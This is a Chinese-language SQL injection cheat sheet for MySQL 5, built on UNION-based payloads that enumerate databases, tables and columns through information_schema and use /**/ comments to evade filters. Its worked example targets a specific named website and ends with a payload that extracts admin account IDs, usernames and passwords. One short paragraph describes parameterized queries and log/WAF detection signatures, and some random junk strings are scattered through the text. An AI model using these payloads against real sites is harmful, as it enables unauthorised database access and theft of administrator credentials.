查库
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

查表
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1

查段
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1

mysql5高级注入方法暴表

说明:以上语句查询的是 MySQL 5.0 起内置的 information_schema 元数据库;注入之所以成立,是因为 id 这类参数被直接拼接进 SQL 语句。防御上应改用参数化(预编译)查询,并可在访问日志或 WAF 中以查询串里出现的 information_schema、union select 与 /**/ 作为识别特征。

例子如下:

1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)7 N! w# n6 w9 P* u+ x
这样爆到第4个时出现了admin_user表。

2.暴字段
4 Q; N; c) r. H9 o. j0 chttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*9 T4 {, j9 _2 r: `2 f: V
" A) f: `4 b, d0 w4 o
3.爆密码
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*